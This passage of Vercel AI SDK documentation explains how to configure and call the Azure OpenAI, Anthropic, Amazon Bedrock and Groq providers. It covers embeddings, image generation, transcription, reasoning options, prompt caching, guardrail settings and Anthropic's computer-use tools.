- suffix string: The suffix that comes after a completion of inserted text.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Embedding Models
You can create models that call the Azure OpenAI embeddings API
using the .embedding() factory method.
const model = azure.embedding('your-embedding-deployment');
Azure OpenAI embedding models support several additional settings. You can pass them as an options argument:
const model = azure.embedding('your-embedding-deployment', {
  dimensions: 512, // optional, number of dimensions for the embedding
  user: 'test-user', // optional unique user identifier
});
The following optional settings are available for Azure OpenAI embedding models:
-
dimensions: number
The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
-
user string
A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
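The embedding model can then be used with the embed function from the AI SDK. A minimal sketch (deployment name and input value are placeholders):

import { azure } from '@ai-sdk/azure';
import { embed } from 'ai';

const { embedding } = await embed({
  model: azure.embedding('your-embedding-deployment', { dimensions: 512 }),
  value: 'sunny day at the beach',
});

console.log(embedding.length); // 512, matching the dimensions setting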
Image Models
You can create models that call the Azure OpenAI image generation API (DALL-E) using the .imageModel() factory method. The first argument is your deployment name for the DALL-E model.
const model = azure.imageModel('your-dalle-deployment-name');
Azure OpenAI image models support several additional settings. You can pass them as an options argument:
const model = azure.imageModel('your-dalle-deployment-name', {
user: 'test-user', // optional unique user identifier
responseFormat: 'url', // 'url' or 'b64_json', defaults to 'url'
});
Example
You can use Azure OpenAI image models to generate images with the generateImage function:
import { azure } from '@ai-sdk/azure';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: azure.imageModel('your-dalle-deployment-name'),
prompt: 'A photorealistic image of a cat astronaut floating in space',
size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
});
// image contains the URL or base64 data of the generated image
console.log(image);
Model Capabilities
Azure OpenAI supports DALL-E 2 and DALL-E 3 models through deployments. The capabilities depend on which model version your deployment is using:
| Model Version | Sizes |
|---|---|
| DALL-E 3 | 1024x1024, 1792x1024, 1024x1792 |
| DALL-E 2 | 256x256, 512x512, 1024x1024 |
Transcription Models
You can create models that call the Azure OpenAI transcription API using the .transcription() factory method.
The first argument is the model id e.g. whisper-1.
const model = azure.transcription('whisper-1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { azure } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: azure.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
providerOptions: { azure: { language: 'en' } },
});
The following provider options are available:
-
timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to
['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency. -
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
-
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
-
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
-
include string[] Additional information to include in the transcription response.
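As a sketch of combining these options, the following requests word-level timestamps together with a language hint (deployment name and file path are placeholders):

import { experimental_transcribe as transcribe } from 'ai';
import { azure } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: azure.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    azure: { language: 'en', timestampGranularities: ['word'] },
  },
});

console.log(result.text);
console.log(result.segments); // word-level segments with start/end times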
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-1 | | | | |
| gpt-4o-mini-transcribe | | | | |
| gpt-4o-transcribe | | | | |
title: Anthropic description: Learn how to use the Anthropic provider for the AI SDK.
Anthropic Provider
The Anthropic provider contains language model support for the Anthropic Messages API.
Setup
The Anthropic provider is available in the @ai-sdk/anthropic module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn']}>
Provider Instance
You can import the default provider instance anthropic from @ai-sdk/anthropic:
import { anthropic } from '@ai-sdk/anthropic';
If you need a customized setup, you can import createAnthropic from @ai-sdk/anthropic and create a provider instance with your settings:
import { createAnthropic } from '@ai-sdk/anthropic';
const anthropic = createAnthropic({
// custom settings
});
You can use the following optional settings to customize the Anthropic provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.anthropic.com/v1. -
apiKey string
API key that is being sent using the
x-api-key header. It defaults to the ANTHROPIC_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. claude-3-haiku-20240307.
Some models have multi-modal capabilities.
const model = anthropic('claude-3-haiku-20240307');
You can use Anthropic language models to generate text with the generateText function:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-3-haiku-20240307'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Anthropic language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
The following optional settings are available for Anthropic models:
-
sendReasoning boolean Optional. Include reasoning content in requests sent to the model. Defaults to
true. If you are experiencing issues with the model handling requests involving reasoning content, you can set this to
false to omit them from the request.
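For example, a minimal sketch of disabling reasoning content in requests:

import { anthropic } from '@ai-sdk/anthropic';

// omit reasoning content from requests sent to the model
const model = anthropic('claude-3-7-sonnet-20250219', {
  sendReasoning: false,
});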
Reasoning
Anthropic has reasoning support for claude-4-opus-20250514, claude-4-sonnet-20250514, and claude-3-7-sonnet-20250219 models.
You can enable it using the thinking provider option
and specifying a thinking budget in tokens.
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoning, reasoningDetails } = await generateText({
model: anthropic('claude-4-opus-20250514'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicProviderOptions,
},
});
console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
The cache creation input tokens are then returned in the providerMetadata object
for generateText and generateObject, again under the anthropic property.
When you use streamText or streamObject, the response contains a promise
that resolves to the metadata. Alternatively you can receive it in the
onFinish callback.
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const errorMessage = '... long error message ...';
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'You are a JavaScript expert.' },
{
type: 'text',
text: `Error message: ${errorMessage}`,
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{ type: 'text', text: 'Explain the error message.' },
],
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118, cacheReadInputTokens: 0 }
You can also use cache control on system messages by providing multiple system messages at the head of your messages array:
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'system',
content: 'Cached system message part',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'system',
content: 'Uncached system message part',
},
{
role: 'user',
content: 'User prompt',
},
],
});
The minimum cacheable prompt length is:
- 1024 tokens for Claude 3.7 Sonnet, Claude 3.5 Sonnet and Claude 3 Opus
- 2048 tokens for Claude 3.5 Haiku and Claude 3 Haiku
Shorter prompts cannot be cached, even if marked with cacheControl. Any requests to cache fewer than this number of tokens will be processed without caching.
For more on prompt caching with Anthropic, see Anthropic's Cache Control documentation.
Computer Use
Anthropic provides three built-in tools that can be used to interact with external systems:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = anthropic.tools.bash_20241022({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- command (string): The bash command to run. Required unless the tool is being restarted.
- restart (boolean, optional): Specifying true will restart this tool.
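A minimal sketch of wiring the tool to a local shell and passing it to generateText follows (the tools key is assumed to be bash; executing model-generated commands directly is unsafe outside a sandboxed environment):

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
import { exec } from 'child_process';
import { promisify } from 'util';

const execAsync = promisify(exec);

const bashTool = anthropic.tools.bash_20241022({
  execute: async ({ command }) => {
    // run the model-generated command locally (unsafe outside a sandbox)
    const { stdout, stderr } = await execAsync(command);
    return stdout || stderr;
  },
});

const { text } = await generateText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  prompt: 'List the files in the current directory.',
  tools: { bash: bashTool },
});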
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files:
const textEditorTool = anthropic.tools.textEditor_20241022({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
Parameters:
- command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run.
- path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
- file_text (string, optional): Required for the create command, with the content of the file to be created.
- insert_line (number, optional): Required for the insert command. The line number after which to insert the new string.
- new_str (string, optional): New string for the str_replace or insert commands.
- old_str (string, optional): Required for the str_replace command, containing the string to replace.
- view_range (number[], optional): Optional for the view command to specify the line range to show.
When using the Text Editor Tool, make sure to name the key in the tools object str_replace_editor.
const response = await generateText({
model: anthropic('claude-3-5-sonnet-20241022'),
prompt:
"Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
str_replace_editor: textEditorTool,
},
});
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
const computerTool = anthropic.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
experimental_toToolResultContent(result) {
return typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'image', data: result.data, mimeType: 'image/png' }];
},
});
Parameters:
- action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- coordinate (number[], optional): Required for the mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
- text (string, optional): Required for the type and key actions.
These tools can be used in conjunction with the claude-3-5-sonnet-20240620 model to enable more complex interactions and tasks.
PDF support
Anthropic Sonnet claude-3-5-sonnet-20241022 supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
Option 1: URL-based PDF document
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20241022'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: new URL(
'https://github.com/vercel/ai/blob/main/examples/ai-core/data/ai.pdf?raw=true',
),
mimeType: 'application/pdf',
},
],
},
],
});
Option 2: Base64-encoded PDF document
import fs from 'fs';

const result = await generateText({
model: anthropic('claude-3-5-sonnet-20241022'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mimeType: 'application/pdf',
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mimeType should be set to 'application/pdf'.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Computer Use |
|---|---|---|---|---|
| claude-4-opus-20250514 | | | | |
| claude-4-sonnet-20250514 | | | | |
| claude-3-7-sonnet-20250219 | | | | |
| claude-3-5-sonnet-20241022 | | | | |
| claude-3-5-sonnet-20240620 | | | | |
| claude-3-5-haiku-20241022 | | | | |
| claude-3-opus-20240229 | | | | |
| claude-3-sonnet-20240229 | | | | |
| claude-3-haiku-20240307 | | | | |
title: Amazon Bedrock description: Learn how to use the Amazon Bedrock provider.
Amazon Bedrock Provider
The Amazon Bedrock provider for the AI SDK contains language model support for the Amazon Bedrock APIs.
Setup
The Bedrock provider is available in the @ai-sdk/amazon-bedrock module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn']}>
Prerequisites
Access to Amazon Bedrock foundation models isn't granted by default. In order to gain access to a foundation model, an IAM user with sufficient permissions needs to request access to it through the console. Once access is provided to a model, it is available for all users in the account.
See the Model Access Docs for more information.
Authentication
Using IAM Access Key and Secret Key
Step 1: Creating AWS Access Key and Secret Key
To get started, you'll need to create an AWS access key and secret key. Here's how:
Login to AWS Management Console
- Go to the AWS Management Console and log in with your AWS account credentials.
Create an IAM User
- Navigate to the IAM dashboard and click on "Users" in the left-hand navigation menu.
- Click on "Create user" and fill in the required details to create a new IAM user.
- Make sure to select "Programmatic access" as the access type.
- The user account needs the
AmazonBedrockFullAccess policy attached to it.
Create Access Key
- Click on the "Security credentials" tab and then click on "Create access key".
- Click "Create access key" to generate a new access key pair.
- Download the
.csv file containing the access key ID and secret access key.
Step 2: Configuring the Access Key and Secret Key
Within your project add a .env file if you don't already have one. This file will be used to set the access key and secret key as environment variables. Add the following lines to the .env file:
AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY=YOUR_SECRET_ACCESS_KEY
AWS_REGION=YOUR_REGION
Remember to replace YOUR_ACCESS_KEY_ID, YOUR_SECRET_ACCESS_KEY, and YOUR_REGION with the actual values from your AWS account.
Using AWS SDK Credentials Chain (instance profiles, instance roles, ECS roles, EKS Service Accounts, etc.)
When using the AWS SDK, the SDK automatically uses the credential provider chain to determine which credentials to use. This includes instance profiles, instance roles, ECS roles, EKS Service Accounts, etc. You can get the same behavior with the AI SDK by not specifying the accessKeyId, secretAccessKey, and sessionToken properties in the provider settings and instead passing a credentialProvider property.
Usage:
The @aws-sdk/credential-providers package provides a set of credential providers that can be used to create a credential provider chain.
<Tabs items={['pnpm', 'npm', 'yarn']}>
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
import { fromNodeProviderChain } from '@aws-sdk/credential-providers';
const bedrock = createAmazonBedrock({
region: 'us-east-1',
credentialProvider: fromNodeProviderChain(),
});
Provider Instance
You can import the default provider instance bedrock from @ai-sdk/amazon-bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
If you need a customized setup, you can import createAmazonBedrock from @ai-sdk/amazon-bedrock and create a provider instance with your settings:
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
const bedrock = createAmazonBedrock({
region: 'us-east-1',
accessKeyId: 'xxxxxxxxx',
secretAccessKey: 'xxxxxxxxx',
sessionToken: 'xxxxxxxxx',
});
You can use the following optional settings to customize the Amazon Bedrock provider instance:
-
region string
The AWS region that you want to use for the API calls. It uses the
AWS_REGION environment variable by default. -
accessKeyId string
The AWS access key ID that you want to use for the API calls. It uses the
AWS_ACCESS_KEY_ID environment variable by default. -
secretAccessKey string
The AWS secret access key that you want to use for the API calls. It uses the
AWS_SECRET_ACCESS_KEY environment variable by default. -
sessionToken string
Optional. The AWS session token that you want to use for the API calls. It uses the
AWS_SESSION_TOKEN environment variable by default. -
credentialProvider () => Promise<{ accessKeyId: string; secretAccessKey: string; sessionToken?: string; }>
Optional. The AWS credential provider chain that you want to use for the API calls. It uses the specified credentials by default.
Language Models
You can create models that call the Bedrock API using the provider instance.
The first argument is the model id, e.g. meta.llama3-70b-instruct-v1:0.
const model = bedrock('meta.llama3-70b-instruct-v1:0');
Amazon Bedrock models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = bedrock('anthropic.claude-3-sonnet-20240229-v1:0', {
additionalModelRequestFields: { top_k: 350 },
});
Documentation for additional settings based on the selected model can be found within the Amazon Bedrock Inference Parameter Documentation.
You can use Amazon Bedrock language models to generate text with the generateText function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Amazon Bedrock language models can also be used in the streamText function
(see AI SDK Core).
File Inputs
The Amazon Bedrock provider supports file inputs, e.g. PDF files.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
import fs from 'fs';
const result = await generateText({
model: bedrock('anthropic.claude-3-haiku-20240307-v1:0'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe the pdf in detail.' },
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mimeType: 'application/pdf',
},
],
},
],
});
Guardrails
You can use the bedrock provider options to utilize Amazon Bedrock Guardrails:
const result = await generateText({
model: bedrock('anthropic.claude-3-sonnet-20240229-v1:0'),
providerOptions: {
bedrock: {
guardrailConfig: {
guardrailIdentifier: '1abcd2ef34gh',
guardrailVersion: '1',
trace: 'enabled' as const,
streamProcessingMode: 'async',
},
},
},
});
Tracing information will be returned in the provider metadata if you have tracing enabled.
if (result.providerMetadata?.bedrock?.trace) {
// ...
}
See the Amazon Bedrock Guardrails documentation for more information.
Cache Points
In messages, you can use the providerOptions property to set cache points. Set the bedrock property in the providerOptions object to { cachePoint: { type: 'default' } } to create a cache point.
Cache usage information is returned in the providerMetadata object. See examples below.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const cyberpunkAnalysis =
'... literary analysis of cyberpunk themes and concepts ...';
const result = await generateText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
messages: [
{
role: 'system',
content: `You are an expert on William Gibson's cyberpunk literature and themes. You have access to the following academic analysis: ${cyberpunkAnalysis}`,
providerOptions: {
bedrock: { cachePoint: { type: 'default' } },
},
},
{
role: 'user',
content:
'What are the key cyberpunk themes that Gibson explores in Neuromancer?',
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.bedrock?.usage);
// Shows cache read/write token usage, e.g.:
// {
// cacheReadInputTokens: 1337,
// cacheWriteInputTokens: 42,
// }
Cache points also work with streaming responses:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const cyberpunkAnalysis =
'... literary analysis of cyberpunk themes and concepts ...';
const result = streamText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
messages: [
{
role: 'assistant',
content: [
{ type: 'text', text: 'You are an expert on cyberpunk literature.' },
{ type: 'text', text: `Academic analysis: ${cyberpunkAnalysis}` },
],
providerOptions: { bedrock: { cachePoint: { type: 'default' } } },
},
{
role: 'user',
content:
'How does Gibson explore the relationship between humanity and technology?',
},
],
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log(
'Cache token usage:',
(await result.providerMetadata)?.bedrock?.usage,
);
// Shows cache read/write token usage, e.g.:
// {
// cacheReadInputTokens: 1337,
// cacheWriteInputTokens: 42,
// }
Reasoning
Amazon Bedrock has reasoning support for the claude-3-7-sonnet-20250219 model.
You can enable it using the reasoningConfig provider option and specifying a thinking budget in tokens (minimum: 1024, maximum: 64000).
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { text, reasoning, reasoningDetails } = await generateText({
model: bedrock('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
bedrock: {
reasoningConfig: { type: 'enabled', budgetTokens: 1024 },
},
},
});
console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| amazon.titan-tg1-large | | | | |
| amazon.titan-text-express-v1 | | | | |
| amazon.nova-micro-v1:0 | | | | |
| amazon.nova-lite-v1:0 | | | | |
| amazon.nova-pro-v1:0 | | | | |
| anthropic.claude-4-sonnet-20250514-v1:0 | | | | |
| anthropic.claude-4-opus-20250514-v1:0 | | | | |
| anthropic.claude-3-7-sonnet-20250219-v1:0 | | | | |
| anthropic.claude-3-5-sonnet-20241022-v2:0 | | | | |
| anthropic.claude-3-5-sonnet-20240620-v1:0 | | | | |
| anthropic.claude-3-5-haiku-20241022-v1:0 | | | | |
| anthropic.claude-3-opus-20240229-v1:0 | | | | |
| anthropic.claude-3-sonnet-20240229-v1:0 | | | | |
| anthropic.claude-3-haiku-20240307-v1:0 | | | | |
| anthropic.claude-v2:1 | | | | |
| cohere.command-r-v1:0 | | | | |
| cohere.command-r-plus-v1:0 | | | | |
| deepseek.r1-v1:0 | | | | |
| meta.llama2-13b-chat-v1 | | | | |
| meta.llama2-70b-chat-v1 | | | | |
| meta.llama3-8b-instruct-v1:0 | | | | |
| meta.llama3-70b-instruct-v1:0 | | | | |
| meta.llama3-1-8b-instruct-v1:0 | | | | |
| meta.llama3-1-70b-instruct-v1:0 | | | | |
| meta.llama3-1-405b-instruct-v1:0 | | | | |
| meta.llama3-2-1b-instruct-v1:0 | | | | |
| meta.llama3-2-3b-instruct-v1:0 | | | | |
| meta.llama3-2-11b-instruct-v1:0 | | | | |
| meta.llama3-2-90b-instruct-v1:0 | | | | |
| mistral.mistral-7b-instruct-v0:2 | | | | |
| mistral.mixtral-8x7b-instruct-v0:1 | | | | |
| mistral.mistral-large-2402-v1:0 | | | | |
| mistral.mistral-small-2402-v1:0 | | | | |
Embedding Models
You can create models that call the Bedrock embeddings API
using the .embedding() factory method.
const model = bedrock.embedding('amazon.titan-embed-text-v1');
Bedrock Titan embedding model amazon.titan-embed-text-v2:0 supports several additional settings. You can pass them as an options argument:
const model = bedrock.embedding('amazon.titan-embed-text-v2:0', {
  dimensions: 512, // optional, number of dimensions for the embedding
  normalize: true, // optional, normalize the output embeddings
});
The following optional settings are available for Bedrock Titan embedding models:
-
dimensions: number
The number of dimensions the output embeddings should have. The following values are accepted: 1024 (default), 512, 256.
-
normalize boolean
Flag indicating whether or not to normalize the output embeddings. Defaults to true.
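A sketch of using the model with the embed function (the input value is a placeholder):

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';

// generate a normalized 512-dimensional embedding
const { embedding } = await embed({
  model: bedrock.embedding('amazon.titan-embed-text-v2:0', {
    dimensions: 512,
    normalize: true,
  }),
  value: 'sunny day at the beach',
});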
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| amazon.titan-embed-text-v1 | 1536 | |
| amazon.titan-embed-text-v2:0 | 1024 | 512, 256 |
Image Models
You can create models that call the Bedrock image generation API
using the .image() factory method.
For more on the Amazon Nova Canvas image model, see the Nova Canvas Overview.
const model = bedrock.image('amazon.nova-canvas-v1:0');
You can then generate images with the experimental_generateImage function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: bedrock.imageModel('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
});
You can also pass the providerOptions object to the generateImage function to customize the generation behavior:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: bedrock.imageModel('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
providerOptions: { bedrock: { quality: 'premium' } },
});
Documentation for additional settings can be found within the Amazon Bedrock User Guide for Amazon Nova Documentation.
Image Model Settings
When creating an image model, you can customize the generation behavior with optional settings:
const model = bedrock.imageModel('amazon.nova-canvas-v1:0', {
maxImagesPerCall: 1, // Maximum number of images to generate per API call
});
-
maxImagesPerCall number
Override the maximum number of images generated per API call. Default can vary by model, with 5 as a common default.
Model Capabilities
The Amazon Nova Canvas model supports custom sizes with constraints as follows:
- Each side must be between 320-4096 pixels, inclusive.
- Each side must be evenly divisible by 16.
- The aspect ratio must be between 1:4 and 4:1. That is, one side can't be more than 4 times longer than the other side.
- The total pixel count must be less than 4,194,304.
For more, see Image generation access and usage.
| Model | Sizes |
|---|---|
| amazon.nova-canvas-v1:0 | Custom sizes: 320-4096px per side (must be divisible by 16), aspect ratio 1:4 to 4:1, max 4.2M pixels |
Response Headers
The Amazon Bedrock provider will return the response headers associated with network requests made to the Bedrock servers.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
console.log(result.response.headers);
Below is sample output where you can see the x-amzn-requestid header. This can
be useful for correlating Bedrock API calls with requests made by the AI SDK:
{
connection: 'keep-alive',
'content-length': '2399',
'content-type': 'application/json',
date: 'Fri, 07 Feb 2025 04:28:30 GMT',
'x-amzn-requestid': 'c9f3ace4-dd5d-49e5-9807-39aedfa47c8e'
}
This information is also available with streamText:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const result = streamText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log('Response headers:', (await result.response).headers);
With sample output as:
{
connection: 'keep-alive',
'content-type': 'application/vnd.amazon.eventstream',
date: 'Fri, 07 Feb 2025 04:33:37 GMT',
'transfer-encoding': 'chunked',
'x-amzn-requestid': 'a976e3fc-0e45-4241-9954-b9bdd80ab407'
}
Migrating to @ai-sdk/amazon-bedrock 2.x
The Amazon Bedrock provider was rewritten in version 2.x to remove the
dependency on the @aws-sdk/client-bedrock-runtime package.
The bedrockOptions provider setting previously available has been removed. If
you were using the bedrockOptions object, you should now use the region,
accessKeyId, secretAccessKey, and sessionToken settings directly instead.
Note that you may need to set all of these explicitly, e.g. even if you're not
using sessionToken, set it to undefined. If you're running in a serverless
environment, there may be default environment variables set by your containing
environment that the Amazon Bedrock provider will then pick up and could
conflict with the ones you're intending to use.
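A minimal sketch of the resulting 2.x-style configuration, reading the values from environment variables for illustration:

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';

const bedrock = createAmazonBedrock({
  region: process.env.AWS_REGION,
  accessKeyId: process.env.AWS_ACCESS_KEY_ID,
  secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  sessionToken: undefined, // set explicitly even when unused
});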
title: Groq description: Learn how to use Groq.
Groq Provider
The Groq provider contains language model support for the Groq API.
Setup
The Groq provider is available via the @ai-sdk/groq module.
You can install it with
<Tabs items={['pnpm', 'npm', 'yarn']}>
Provider Instance
You can import the default provider instance groq from @ai-sdk/groq:
import { groq } from '@ai-sdk/groq';
If you need a customized setup, you can import createGroq from @ai-sdk/groq
and create a provider instance with your settings:
import { createGroq } from '@ai-sdk/groq';
const groq = createGroq({
// custom settings
});
You can use the following optional settings to customize the Groq provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.groq.com/openai/v1. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the GROQ_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create Groq models using a provider instance.
The first argument is the model id, e.g. gemma2-9b-it.
const model = groq('gemma2-9b-it');
Reasoning Models
Groq offers several reasoning models such as qwen-qwq-32b and deepseek-r1-distill-llama-70b.
You can configure how the reasoning is exposed in the generated text by using the reasoningFormat option.
It supports the options parsed, hidden, and raw.
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const result = await generateText({
model: groq('qwen-qwq-32b'),
providerOptions: {
groq: { reasoningFormat: 'parsed' },
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
Only Groq reasoning models support the reasoningFormat option.
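With reasoningFormat: 'parsed', the reasoning is separated from the final answer; a sketch of reading both from the result above (the reasoning field is assumed to be populated for reasoning models):

console.log(result.reasoning); // the parsed reasoning
console.log(result.text); // the final answer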
Example
You can use Groq language models to generate text with the generateText function:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const { text } = await generateText({
model: groq('gemma2-9b-it'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/llama-4-scout-17b-16e-instruct | | | | |
| gemma2-9b-it | | | | |
| llama-3.3-70b-versatile | | | | |
| llama-3.1-8b-instant | | | | |
| llama-guard-3-8b | | | | |
| llama3-70b-8192 | | | | |
| llama3-8b-8192 | | | | |
| mixtral-8x7b-32768 | | | | |
| qwen-qwq-32b | | | | |
| mistral-saba-24b | | | | |
| qwen-2.5-32b | | | | |
| deepseek-r1-distill-qwen-32b | | | | |
| deepseek-r1-distill-llama-70b | | | | |
